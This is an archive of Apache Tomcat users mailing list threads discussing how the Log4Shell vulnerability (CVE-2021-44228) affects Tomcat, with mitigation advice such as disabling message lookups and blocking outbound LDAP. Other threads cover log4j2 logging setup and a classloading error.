versions that switched to using log4j 1.x is may need to address this 
vulnerability although it is not clear if log4j 1.x is affected.


This JNDI thing is a log4j 2 feature, so log4j 1.x should not be affected.

Regardless, they'll need to address the Tomcat vulnerabilities that have 
been made public in those 5+ years.


It is possible to configure Tomcat to use log4j 2.x for its internal 
logging. This requires explicit configuration and the addition of the 
log4j 2.x library. Anyone who has switched Tomcat's internal logging to 
log4j 2.x is likely to need to address this vulnerability. Again, 
disabling the vulnerable feature is likely to be the simplest solution.


As Jon McAlexander has pointed out, adding the following to 
CATALINA_OPTS in setenv.sh / setenv.bat will disable the problematic 
feature


-Dlog4j2.formatMsgNoLookups=true


Just to be clear, this only works for log4j versions 2.10 and later. If 
you are running earlier than that, you may want to upgrade. Or see my 
other post in this thread.


-chris

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Christopher Schultz]

All,

On 12/11/21 03:18, Mark Thomas wrote:

On 10/12/2021 22:17, James H. H. Lampert wrote:

A customer brought this to my attention:

https://www.randori.com/blog/cve-2021-44228/

I have no idea how (or if) Tomcat is affected. I have only the vaguest 
idea what this vulnerability even *is.*


Can anybody here shed any light?


Currently supported Tomcat versions (8.5.x, 9.0.x, 10.0.x and 10.1.x) 
have no dependency on log4j.


+1


Applications may have a dependency on log4j.


+1


-Dlog4j2.formatMsgNoLookups=true


This feature should have been disabled by default in the first place. :/

I have a few other comments for everyone who is losing their fscking 
minds over this:


0. This isn't a 0-day, so stop calling it that.

1. Calm down. This isn't fscking heartbleed.

2. If you are using a recent Java version, you are fine. Remote 
classloading of the type being used in these attacks was disabled by 
default in Java 8u121[1] and similar-era (2017, people!) JREs.


2. Why is *anyone* allowing arbitrary outbound LDAP connections from 
their servers? I'm honestly very confused and astounded that this is a 
problem for network servers *at all* because any idiot should have this 
in their firewall configuration:


OUTBOUND 389 -> DROP
OUTBOUND 636 -> DROP

In fact, everyone should have THIS:

OUTBOUND [stuff I actually use] -> ALLOW
OUTBOUND * -> DROP

The fact that this is causing "major problems" for the world is down to 
one of two things:


1. There isn't actually any major problem at all
2. Admins everywhere don't actually know anything about security

-chris

[1] https://www.oracle.com/java/technologies/javase/8u121-relnotes.html

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Mark Thomas]

On 10/12/2021 22:17, James H. H. Lampert wrote:

A customer brought this to my attention:

https://www.randori.com/blog/cve-2021-44228/

I have no idea how (or if) Tomcat is affected. I have only the vaguest 
idea what this vulnerability even *is.*


Can anybody here shed any light?


Currently supported Tomcat versions (8.5.x, 9.0.x, 10.0.x and 10.1.x) 
have no dependency on log4j.


Applications may have a dependency on log4j. You should seek support 
from your application vendors on how best to address this vulnerability 
although disabling the vulnerable feature is likely to be the simplest 
solution.


Tomcat 8.0.x and earlier as well as the first few releases of 8.5.x 
provided optional support for switching Tomcat's internal logging to 
log4j 1.x. Anyone one using these very old (5+ years), unsupported 
versions that switched to using log4j 1.x is may need to address this 
vulnerability although it is not clear if log4j 1.x is affected. 
Regardless, they'll need to address the Tomcat vulnerabilities that have 
been made public in those 5+ years.


It is possible to configure Tomcat to use log4j 2.x for its internal 
logging. This requires explicit configuration and the addition of the 
log4j 2.x library. Anyone who has switched Tomcat's internal logging to 
log4j 2.x is likely to need to address this vulnerability. Again, 
disabling the vulnerable feature is likely to be the simplest solution.


As Jon McAlexander has pointed out, adding the following to 
CATALINA_OPTS in setenv.sh / setenv.bat will disable the problematic feature


-Dlog4j2.formatMsgNoLookups=true

Mark

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[jonmcalexander]

If you aren't able to get the "fixed" version of the jar that fixes the 
vulnerability, I would suggest adding this to your Java Options for Tomcat:

-Dlog4j2.formatMsgNoLookups=true

Thanks,

Dream * Excel * Explore * Inspire
Jon McAlexander
Infrastructure Engineer
Asst Vice President

Middleware Product Engineering
Enterprise CIO | EAS | Middleware | Infrastructure Solutions

8080 Cobblestone Rd | Urbandale, IA 50322
MAC: F4469-010
Tel 515-988-2508 | Cell 515-988-2508

jonmcalexan...@wellsfargo.com
This message may contain confidential and/or privileged information. If you are 
not the addressee or authorized to receive this for the addressee, you must not 
use, copy, disclose, or take any action based on this message or any 
information herein. If you have received this message in error, please advise 
the sender immediately by reply e-mail and delete this message. Thank you for 
your cooperation.


> -Original Message-
> From: James H. H. Lampert 
> Sent: Friday, December 10, 2021 4:17 PM
> To: Tomcat Users List 
> Subject: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect
> Tomcat?
> 
> A customer brought this to my attention:
> 
> https://urldefense.com/v3/__https://www.randori.com/blog/cve-2021-
> 44228/__;!!F9svGWnIaVPGSwU!4F2Gxy74aEjsyAmQbarXs0sh-
> EMIt2eM6h6liBLnKEwxjqWAPfIMcp1Od6nSrgSx9n0rFIs$
> 
> I have no idea how (or if) Tomcat is affected. I have only the vaguest idea
> what this vulnerability even *is.*
> 
> Can anybody here shed any light?
> 
> --
> JHHL
> 
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org

CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[James H. H. Lampert]

A customer brought this to my attention:

https://www.randori.com/blog/cve-2021-44228/

I have no idea how (or if) Tomcat is affected. I have only the vaguest 
idea what this vulnerability even *is.*


Can anybody here shed any light?

--
JHHL

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Using log4j for logging

[Mark Thomas]

On 29/06/2021 17:53, Niranjan Rao wrote:

We are actually using log4j2, I should have been more clearer.


Ack.

Does this mean we don't have to use specialized juli jar and adapters 
and many of the stackoverflow answers are out of date?


Yes.

I have seen 
answers saying download juli adapter version from tomcat version 7 and 
use it for 9 or similar.


I guess that might work but I'd be surprised.

Mark



Regards,

Niranjan

On 6/29/21 12:24 AM, Mark Thomas wrote:

On 29/06/2021 01:11, Niranjan Rao wrote:

Greetings,

I wanted to setup log4j for tomcat logs and google searches seems to 
indicate that this is possible. Many articles speak about downloading 
tomcat-juli-adapters.jar from bin/extras directory.


I found out that for tomcat version 9, extras directory is last 
present on version 9.0.14 
(https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.14/bin/). 
Latter versions do not have extras directory.


Is tomcat-juli-adapters file no longer required? What will be the 
best way to configure tomcat logs using log4j.


log4j was declared end of life in 2015. If you really need to use 
log4j then there are some pointers here:


https://stackoverflow.com/questions/869945/how-to-send-java-util-logging-to-log4j 



I'd recommend the answer from Emmanuel Bourg.

If you are using log4j2 then you can use:
https://logging.apache.org/log4j/2.x/log4j-jpl/index.html

Mark

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org




-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org




-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Using log4j for logging

[Niranjan Rao]

We are actually using log4j2, I should have been more clearer.

Does this mean we don't have to use specialized juli jar and adapters 
and many of the stackoverflow answers are out of date? I have seen 
answers saying download juli adapter version from tomcat version 7 and 
use it for 9 or similar.


Regards,

Niranjan

On 6/29/21 12:24 AM, Mark Thomas wrote:

On 29/06/2021 01:11, Niranjan Rao wrote:

Greetings,

I wanted to setup log4j for tomcat logs and google searches seems to 
indicate that this is possible. Many articles speak about downloading 
tomcat-juli-adapters.jar from bin/extras directory.


I found out that for tomcat version 9, extras directory is last 
present on version 9.0.14 
(https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.14/bin/). 
Latter versions do not have extras directory.


Is tomcat-juli-adapters file no longer required? What will be the 
best way to configure tomcat logs using log4j.


log4j was declared end of life in 2015. If you really need to use 
log4j then there are some pointers here:


https://stackoverflow.com/questions/869945/how-to-send-java-util-logging-to-log4j 



I'd recommend the answer from Emmanuel Bourg.

If you are using log4j2 then you can use:
https://logging.apache.org/log4j/2.x/log4j-jpl/index.html

Mark

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org




-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Using log4j for logging

[Mark Thomas]

On 29/06/2021 01:11, Niranjan Rao wrote:

Greetings,

I wanted to setup log4j for tomcat logs and google searches seems to 
indicate that this is possible. Many articles speak about downloading 
tomcat-juli-adapters.jar from bin/extras directory.


I found out that for tomcat version 9, extras directory is last present 
on version 9.0.14 
(https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.14/bin/). Latter 
versions do not have extras directory.


Is tomcat-juli-adapters file no longer required? What will be the best 
way to configure tomcat logs using log4j.


log4j was declared end of life in 2015. If you really need to use log4j 
then there are some pointers here:


https://stackoverflow.com/questions/869945/how-to-send-java-util-logging-to-log4j

I'd recommend the answer from Emmanuel Bourg.

If you are using log4j2 then you can use:
https://logging.apache.org/log4j/2.x/log4j-jpl/index.html

Mark

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Using log4j for logging

[Niranjan Rao]

Greetings,

I wanted to setup log4j for tomcat logs and google searches seems to 
indicate that this is possible. Many articles speak about downloading 
tomcat-juli-adapters.jar from bin/extras directory.


I found out that for tomcat version 9, extras directory is last present 
on version 9.0.14 
(https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.14/bin/). Latter 
versions do not have extras directory.


Is tomcat-juli-adapters file no longer required? What will be the best 
way to configure tomcat logs using log4j.



My main interest is uploading access logs and catalina.out to AWS/S3 
bucket. For our application logs, we are already doing this. If there is 
a better way to achieve this, open to that solution too.



Regards,

Niranjan


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: log4j failed on tomcat9

[AJ Chen]

More test info trying to isolate the problem:
Task:
  developing  web app project on eclipse 2019 version. main project
includes a dependent project (sub-project) on the same eclipse.

Run main app as java app:
  main app vm parameters include: -Dlog4j.configurationFile,
LogManager.getLogger() returns correct logger in main app as well as
sub-project code. meaning, Log4j2 messages can print as expected. no error.

Run web app on tomcat 9, 8 or 7:
For tomcat runtime classpath, eclipse requires to add the sub-project and
all the jars needed (include log4j2 jars), otherwise it complains with no
class found error. However, after log4j2 jars are added, it throws the
above " ERROR StatusLogger Unrecognized format specifier " errors. The web
app can run. Log4j2 messages can print in the main app codes. BUT, Logger
in the sub-project codes does not print messages because it has error.

The cause may be in tomcat or in log4j2, or even eclipse. Any idea?

thanks,
-aj



On Fri, May 8, 2020 at 11:21 AM AJ Chen  wrote:

> Hi Mark,
> I also use log4j2 in my web app. dev in eclipse, when adding the log4j2
> jars to tomcat 7,8, or 9 runtime, it has this problem, log4j2.xml is
> provided as VM parameter. Web app firsts instantiates log4j2, and then
> tries to config log4j2 again,  throwing the following error due to double
> class loading:
>
> ERROR StatusLogger Unrecognized format specifier [d]
> ERROR StatusLogger Unrecognized conversion specifier [d] starting at
> position 16 in conversion pattern.
> ERROR StatusLogger Unrecognized format specifier [thread]
> ERROR StatusLogger Unrecognized conversion specifier [thread] starting at
> position 25 in conversion pattern.
> ERROR StatusLogger Unrecognized format specifier [level]
> ERROR StatusLogger Unrecognized conversion specifier [level] starting at
> position 35 in conversion pattern.
> ERROR StatusLogger Unrecognized format specifier [logger]
> ERROR StatusLogger Unrecognized conversion specifier [logger] starting at
> position 47 in conversion pattern.
> ERROR StatusLogger Unrecognized format specifier [msg]
> ERROR StatusLogger Unrecognized conversion specifier [msg] starting at
> position 54 in conversion pattern.
> ERROR StatusLogger Unrecognized format specifier [n]
> ERROR StatusLogger Unrecognized conversion specifier [n] starting at
> position 56 in conversion pattern.
> ERROR StatusLogger Reconfiguration failed: No configuration found for
> '18b4aac2' at 'null' in 'null'
>
> Please note there is problem in the simple log4j2.xml for testing, which
> can be loaded successfully when there is no double class loading.
>
> -aj
>
>
> On Thu, May 7, 2020 at 1:53 PM Mark Thomas  wrote:
>
>> On 07/05/2020 21:40, AJ Chen wrote:
>> > I use eclipse to develop web app for tomcat, Web app has a dependent
>> > project and so the dependent project and all jars are added on the
>> > classpath for tomcat runtime. Log4j works on tomcat 6. But after
>> upgrate to
>> > tomcat 9, log4j failed to start with the following error. Anyone has
>> seen
>> > similar problem? log4j2 also failed. Thanks.
>>
>> Note: log4j is no longer supported.
>>
>> How, exactly, is log4j configured? What JAR files and what configuration
>> files are where? Any other configuration?
>>
>> Mark
>>
>>
>> >
>> > log4j:ERROR A "org.apache.log4j.DailyRollingFileAppender" object is not
>> > assignable to a "org.apache.log4j.Appender" variable.
>> > log4j:ERROR The class "org.apache.log4j.Appender" was loaded by
>> > log4j:ERROR [sun.misc.Launcher$AppClassLoader@18b4aac2] whereas object
>> of
>> > type
>> > log4j:ERROR "org.apache.log4j.DailyRollingFileAppender" was loaded by
>> > [ParallelWebappClassLoader
>> >
>> > aj
>> >
>>
>>
>> -
>> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
>> For additional commands, e-mail: users-h...@tomcat.apache.org
>>
>>

Re: log4j failed on tomcat9

[AJ Chen]

Hi Mark,
I also use log4j2 in my web app. dev in eclipse, when adding the log4j2
jars to tomcat 7,8, or 9 runtime, it has this problem, log4j2.xml is
provided as VM parameter. Web app firsts instantiates log4j2, and then
tries to config log4j2 again,  throwing the following error due to double
class loading:

ERROR StatusLogger Unrecognized format specifier [d]
ERROR StatusLogger Unrecognized conversion specifier [d] starting at
position 16 in conversion pattern.
ERROR StatusLogger Unrecognized format specifier [thread]
ERROR StatusLogger Unrecognized conversion specifier [thread] starting at
position 25 in conversion pattern.
ERROR StatusLogger Unrecognized format specifier [level]
ERROR StatusLogger Unrecognized conversion specifier [level] starting at
position 35 in conversion pattern.
ERROR StatusLogger Unrecognized format specifier [logger]
ERROR StatusLogger Unrecognized conversion specifier [logger] starting at
position 47 in conversion pattern.
ERROR StatusLogger Unrecognized format specifier [msg]
ERROR StatusLogger Unrecognized conversion specifier [msg] starting at
position 54 in conversion pattern.
ERROR StatusLogger Unrecognized format specifier [n]
ERROR StatusLogger Unrecognized conversion specifier [n] starting at
position 56 in conversion pattern.
ERROR StatusLogger Reconfiguration failed: No configuration found for
'18b4aac2' at 'null' in 'null'

Please note there is problem in the simple log4j2.xml for testing, which
can be loaded successfully when there is no double class loading.

-aj


On Thu, May 7, 2020 at 1:53 PM Mark Thomas  wrote:

> On 07/05/2020 21:40, AJ Chen wrote:
> > I use eclipse to develop web app for tomcat, Web app has a dependent
> > project and so the dependent project and all jars are added on the
> > classpath for tomcat runtime. Log4j works on tomcat 6. But after upgrate
> to
> > tomcat 9, log4j failed to start with the following error. Anyone has seen
> > similar problem? log4j2 also failed. Thanks.
>
> Note: log4j is no longer supported.
>
> How, exactly, is log4j configured? What JAR files and what configuration
> files are where? Any other configuration?
>
> Mark
>
>
> >
> > log4j:ERROR A "org.apache.log4j.DailyRollingFileAppender" object is not
> > assignable to a "org.apache.log4j.Appender" variable.
> > log4j:ERROR The class "org.apache.log4j.Appender" was loaded by
> > log4j:ERROR [sun.misc.Launcher$AppClassLoader@18b4aac2] whereas object
> of
> > type
> > log4j:ERROR "org.apache.log4j.DailyRollingFileAppender" was loaded by
> > [ParallelWebappClassLoader
> >
> > aj
> >
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>

Re: log4j failed on tomcat9

[AJ Chen]

Hi Chris,
my web app META-INF/lib has log4j jar,  but CATALINA_BASE/lib does not have
log4j jar listed.
It should be double loading class issue. I need to find out how to exclude
the unwanted classloading.
-aj


On Thu, May 7, 2020 at 2:48 PM Christopher Schultz <
ch...@christopherschultz.net> wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA256
>
> AJ,
>
> On 5/7/20 16:40, AJ Chen wrote:
> > I use eclipse to develop web app for tomcat, Web app has a
> > dependent project and so the dependent project and all jars are
> > added on the classpath for tomcat runtime. Log4j works on tomcat 6.
> > But after upgrate to tomcat 9, log4j failed to start with the
> > following error. Anyone has seen similar problem? log4j2 also
> > failed. Thanks.
> >
> > log4j:ERROR A "org.apache.log4j.DailyRollingFileAppender" object is
> > not assignable to a "org.apache.log4j.Appender" variable.
> > log4j:ERROR The class "org.apache.log4j.Appender" was loaded by
> > log4j:ERROR [sun.misc.Launcher$AppClassLoader@18b4aac2] whereas
> > object of type log4j:ERROR
> > "org.apache.log4j.DailyRollingFileAppender" was loaded by
> > [ParallelWebappClassLoader
>
> Can I just say that the above is a masterpiece of diagnostic error
> messaging?
>
> I can already tell that you have a classloading issue, and it's almost
> certain that you have log4j.jar both in CATALINA_BASE/lib and your web
> application's META-INF/lib directory. Is that the case?
>
> - -chris
> -BEGIN PGP SIGNATURE-
> Comment: Using GnuPG with Thunderbird - https://www.enigmail.net/
>
> iQIzBAEBCAAdFiEEMmKgYcQvxMe7tcJcHPApP6U8pFgFAl60gjsACgkQHPApP6U8
> pFgydxAAvnJ1tJFklOMnsHnx+gFn7m0UkWjs1Sj+1zurmjuAzd64aXjwt8Mh2FRH
> JaJ4R0kYaHruoJxNDKelS+FIYgn1qe7D7LE7uq6gmNHg5b1JruoUXbk2GcaTfM55
> htu9idB/JOyx5lmlP4tR6E/K7HctM6h2A7zuJ2s98VM2WljU/Ts6v5R1C53JbXq6
> gzB0g6XYyVnuQx/9qoSyOSqKIBp3jLp2G8JlKje7SzKZcJeXSzq0HPUX6Do15VK1
> Rl8ineKRjwDHgujjN3DiXqh+BnbdY6URsFApwGVxNLqh/ykIQYIHVxCGuRv9+W3D
> i0Uxx9C2p6rb6Nr8Tk6lxZjx1IMCC0JuKaunHPt6bQ26s/VNEROU5aztQ5RF/ynN
> pjFvwa/UIR6/i5u7mtGo2WBRLmH04KOu/7ZS8FL4ieKHXuaGGDvZlTe3AZ8hBPNx
> 2jHtmpqWiQaw1+lMnL7RxrmGBISIWSH4+MAKXWDzM4OSeTsKxTv2gcZ14Z9HfYZm
> JGO3DGgOSfWAnFSTYX9L/NodRfIDXLMPTAG/epWzSSiF5tf6nAzWNj6Vbi1L0VnS
> 8IdfqHavSGeIqhDqwTSwuQhXYdoc6AyBdY5WIYEGiUNu789b9SjNlY8/EWqjrJKx
> 3Au9YxYkMTqi2SL/r1cCd8HU+imS9L3aSZPKaOn73AsTtux/VCA=
> =IVj+
> -END PGP SIGNATURE-
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>

Re: log4j failed on tomcat9

[AJ Chen]

Hi Luis, good blog for logging settings. thanks.
-aj


On Thu, May 7, 2020 at 11:42 PM Luis Rodríguez Fernández 
wrote:

> Hello AjChen,
>
> Here [1] you can find an example of how I configured log4j2 in tomcat 9.
> You can skip all the bla, bla, bla and go directly to the gitthub repo [2]
> and run the example to have a look at the configuration.
>
> Note: I've been running like this for a while in production, but I do think
> that I am going to come back to the default, beautiful and simple JULI :)
>
> Hope it helps,
>
> Luis
>
> [1]
>
> https://db-blog.web.cern.ch/blog/luis-rodriguez-fernandez/2019-03-keeping-your-logs-clean-apache-tomcat-9-log4j2-and-spring-boot
> [2] https://github.com/lurodrig/log4j2-in-tomcat/
>
> El jue., 7 may. 2020 a las 23:48, Christopher Schultz (<
> ch...@christopherschultz.net>) escribió:
>
> > -BEGIN PGP SIGNED MESSAGE-
> > Hash: SHA256
> >
> > AJ,
> >
> > On 5/7/20 16:40, AJ Chen wrote:
> > > I use eclipse to develop web app for tomcat, Web app has a
> > > dependent project and so the dependent project and all jars are
> > > added on the classpath for tomcat runtime. Log4j works on tomcat 6.
> > > But after upgrate to tomcat 9, log4j failed to start with the
> > > following error. Anyone has seen similar problem? log4j2 also
> > > failed. Thanks.
> > >
> > > log4j:ERROR A "org.apache.log4j.DailyRollingFileAppender" object is
> > > not assignable to a "org.apache.log4j.Appender" variable.
> > > log4j:ERROR The class "org.apache.log4j.Appender" was loaded by
> > > log4j:ERROR [sun.misc.Launcher$AppClassLoader@18b4aac2] whereas
> > > object of type log4j:ERROR
> > > "org.apache.log4j.DailyRollingFileAppender" was loaded by
> > > [ParallelWebappClassLoader
> >
> > Can I just say that the above is a masterpiece of diagnostic error
> > messaging?
> >
> > I can already tell that you have a classloading issue, and it's almost
> > certain that you have log4j.jar both in CATALINA_BASE/lib and your web
> > application's META-INF/lib directory. Is that the case?
> >
> > - -chris
> > -BEGIN PGP SIGNATURE-
> > Comment: Using GnuPG with Thunderbird - https://www.enigmail.net/
> >
> > iQIzBAEBCAAdFiEEMmKgYcQvxMe7tcJcHPApP6U8pFgFAl60gjsACgkQHPApP6U8
> > pFgydxAAvnJ1tJFklOMnsHnx+gFn7m0UkWjs1Sj+1zurmjuAzd64aXjwt8Mh2FRH
> > JaJ4R0kYaHruoJxNDKelS+FIYgn1qe7D7LE7uq6gmNHg5b1JruoUXbk2GcaTfM55
> > htu9idB/JOyx5lmlP4tR6E/K7HctM6h2A7zuJ2s98VM2WljU/Ts6v5R1C53JbXq6
> > gzB0g6XYyVnuQx/9qoSyOSqKIBp3jLp2G8JlKje7SzKZcJeXSzq0HPUX6Do15VK1
> > Rl8ineKRjwDHgujjN3DiXqh+BnbdY6URsFApwGVxNLqh/ykIQYIHVxCGuRv9+W3D
> > i0Uxx9C2p6rb6Nr8Tk6lxZjx1IMCC0JuKaunHPt6bQ26s/VNEROU5aztQ5RF/ynN
> > pjFvwa/UIR6/i5u7mtGo2WBRLmH04KOu/7ZS8FL4ieKHXuaGGDvZlTe3AZ8hBPNx
> > 2jHtmpqWiQaw1+lMnL7RxrmGBISIWSH4+MAKXWDzM4OSeTsKxTv2gcZ14Z9HfYZm
> > JGO3DGgOSfWAnFSTYX9L/NodRfIDXLMPTAG/epWzSSiF5tf6nAzWNj6Vbi1L0VnS
> > 8IdfqHavSGeIqhDqwTSwuQhXYdoc6AyBdY5WIYEGiUNu789b9SjNlY8/EWqjrJKx
> > 3Au9YxYkMTqi2SL/r1cCd8HU+imS9L3aSZPKaOn73AsTtux/VCA=
> > =IVj+
> > -END PGP SIGNATURE-
> >
> > -
> > To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> > For additional commands, e-mail: users-h...@tomcat.apache.org
> >
> >
>
> --
>
> "Ever tried. Ever failed. No matter. Try Again. Fail again. Fail better."
>
> - Samuel Beckett
>

Re: log4j failed on tomcat9

[Luis Rodríguez Fernández]

Hello AjChen,

Here [1] you can find an example of how I configured log4j2 in tomcat 9.
You can skip all the bla, bla, bla and go directly to the gitthub repo [2]
and run the example to have a look at the configuration.

Note: I've been running like this for a while in production, but I do think
that I am going to come back to the default, beautiful and simple JULI :)

Hope it helps,

Luis

[1]
https://db-blog.web.cern.ch/blog/luis-rodriguez-fernandez/2019-03-keeping-your-logs-clean-apache-tomcat-9-log4j2-and-spring-boot
[2] https://github.com/lurodrig/log4j2-in-tomcat/

El jue., 7 may. 2020 a las 23:48, Christopher Schultz (<
ch...@christopherschultz.net>) escribió:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA256
>
> AJ,
>
> On 5/7/20 16:40, AJ Chen wrote:
> > I use eclipse to develop web app for tomcat, Web app has a
> > dependent project and so the dependent project and all jars are
> > added on the classpath for tomcat runtime. Log4j works on tomcat 6.
> > But after upgrate to tomcat 9, log4j failed to start with the
> > following error. Anyone has seen similar problem? log4j2 also
> > failed. Thanks.
> >
> > log4j:ERROR A "org.apache.log4j.DailyRollingFileAppender" object is
> > not assignable to a "org.apache.log4j.Appender" variable.
> > log4j:ERROR The class "org.apache.log4j.Appender" was loaded by
> > log4j:ERROR [sun.misc.Launcher$AppClassLoader@18b4aac2] whereas
> > object of type log4j:ERROR
> > "org.apache.log4j.DailyRollingFileAppender" was loaded by
> > [ParallelWebappClassLoader
>
> Can I just say that the above is a masterpiece of diagnostic error
> messaging?
>
> I can already tell that you have a classloading issue, and it's almost
> certain that you have log4j.jar both in CATALINA_BASE/lib and your web
> application's META-INF/lib directory. Is that the case?
>
> - -chris
> -BEGIN PGP SIGNATURE-
> Comment: Using GnuPG with Thunderbird - https://www.enigmail.net/
>
> iQIzBAEBCAAdFiEEMmKgYcQvxMe7tcJcHPApP6U8pFgFAl60gjsACgkQHPApP6U8
> pFgydxAAvnJ1tJFklOMnsHnx+gFn7m0UkWjs1Sj+1zurmjuAzd64aXjwt8Mh2FRH
> JaJ4R0kYaHruoJxNDKelS+FIYgn1qe7D7LE7uq6gmNHg5b1JruoUXbk2GcaTfM55
> htu9idB/JOyx5lmlP4tR6E/K7HctM6h2A7zuJ2s98VM2WljU/Ts6v5R1C53JbXq6
> gzB0g6XYyVnuQx/9qoSyOSqKIBp3jLp2G8JlKje7SzKZcJeXSzq0HPUX6Do15VK1
> Rl8ineKRjwDHgujjN3DiXqh+BnbdY6URsFApwGVxNLqh/ykIQYIHVxCGuRv9+W3D
> i0Uxx9C2p6rb6Nr8Tk6lxZjx1IMCC0JuKaunHPt6bQ26s/VNEROU5aztQ5RF/ynN
> pjFvwa/UIR6/i5u7mtGo2WBRLmH04KOu/7ZS8FL4ieKHXuaGGDvZlTe3AZ8hBPNx
> 2jHtmpqWiQaw1+lMnL7RxrmGBISIWSH4+MAKXWDzM4OSeTsKxTv2gcZ14Z9HfYZm
> JGO3DGgOSfWAnFSTYX9L/NodRfIDXLMPTAG/epWzSSiF5tf6nAzWNj6Vbi1L0VnS
> 8IdfqHavSGeIqhDqwTSwuQhXYdoc6AyBdY5WIYEGiUNu789b9SjNlY8/EWqjrJKx
> 3Au9YxYkMTqi2SL/r1cCd8HU+imS9L3aSZPKaOn73AsTtux/VCA=
> =IVj+
> -END PGP SIGNATURE-
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>

-- 

"Ever tried. Ever failed. No matter. Try Again. Fail again. Fail better."

- Samuel Beckett

Re: log4j failed on tomcat9

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

AJ,

On 5/7/20 16:40, AJ Chen wrote:
> I use eclipse to develop web app for tomcat, Web app has a
> dependent project and so the dependent project and all jars are
> added on the classpath for tomcat runtime. Log4j works on tomcat 6.
> But after upgrate to tomcat 9, log4j failed to start with the
> following error. Anyone has seen similar problem? log4j2 also
> failed. Thanks.
>
> log4j:ERROR A "org.apache.log4j.DailyRollingFileAppender" object is
> not assignable to a "org.apache.log4j.Appender" variable.
> log4j:ERROR The class "org.apache.log4j.Appender" was loaded by
> log4j:ERROR [sun.misc.Launcher$AppClassLoader@18b4aac2] whereas
> object of type log4j:ERROR
> "org.apache.log4j.DailyRollingFileAppender" was loaded by
> [ParallelWebappClassLoader

Can I just say that the above is a masterpiece of diagnostic error
messaging?

I can already tell that you have a classloading issue, and it's almost
certain that you have log4j.jar both in CATALINA_BASE/lib and your web
application's META-INF/lib directory. Is that the case?

- -chris
-BEGIN PGP SIGNATURE-
Comment: Using GnuPG with Thunderbird - https://www.enigmail.net/

iQIzBAEBCAAdFiEEMmKgYcQvxMe7tcJcHPApP6U8pFgFAl60gjsACgkQHPApP6U8
pFgydxAAvnJ1tJFklOMnsHnx+gFn7m0UkWjs1Sj+1zurmjuAzd64aXjwt8Mh2FRH
JaJ4R0kYaHruoJxNDKelS+FIYgn1qe7D7LE7uq6gmNHg5b1JruoUXbk2GcaTfM55
htu9idB/JOyx5lmlP4tR6E/K7HctM6h2A7zuJ2s98VM2WljU/Ts6v5R1C53JbXq6
gzB0g6XYyVnuQx/9qoSyOSqKIBp3jLp2G8JlKje7SzKZcJeXSzq0HPUX6Do15VK1
Rl8ineKRjwDHgujjN3DiXqh+BnbdY6URsFApwGVxNLqh/ykIQYIHVxCGuRv9+W3D
i0Uxx9C2p6rb6Nr8Tk6lxZjx1IMCC0JuKaunHPt6bQ26s/VNEROU5aztQ5RF/ynN
pjFvwa/UIR6/i5u7mtGo2WBRLmH04KOu/7ZS8FL4ieKHXuaGGDvZlTe3AZ8hBPNx
2jHtmpqWiQaw1+lMnL7RxrmGBISIWSH4+MAKXWDzM4OSeTsKxTv2gcZ14Z9HfYZm
JGO3DGgOSfWAnFSTYX9L/NodRfIDXLMPTAG/epWzSSiF5tf6nAzWNj6Vbi1L0VnS
8IdfqHavSGeIqhDqwTSwuQhXYdoc6AyBdY5WIYEGiUNu789b9SjNlY8/EWqjrJKx
3Au9YxYkMTqi2SL/r1cCd8HU+imS9L3aSZPKaOn73AsTtux/VCA=
=IVj+
-END PGP SIGNATURE-

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: log4j failed on tomcat9

[Mark Thomas]

On 07/05/2020 21:40, AJ Chen wrote:
> I use eclipse to develop web app for tomcat, Web app has a dependent
> project and so the dependent project and all jars are added on the
> classpath for tomcat runtime. Log4j works on tomcat 6. But after upgrate to
> tomcat 9, log4j failed to start with the following error. Anyone has seen
> similar problem? log4j2 also failed. Thanks.

Note: log4j is no longer supported.

How, exactly, is log4j configured? What JAR files and what configuration
files are where? Any other configuration?

Mark


> 
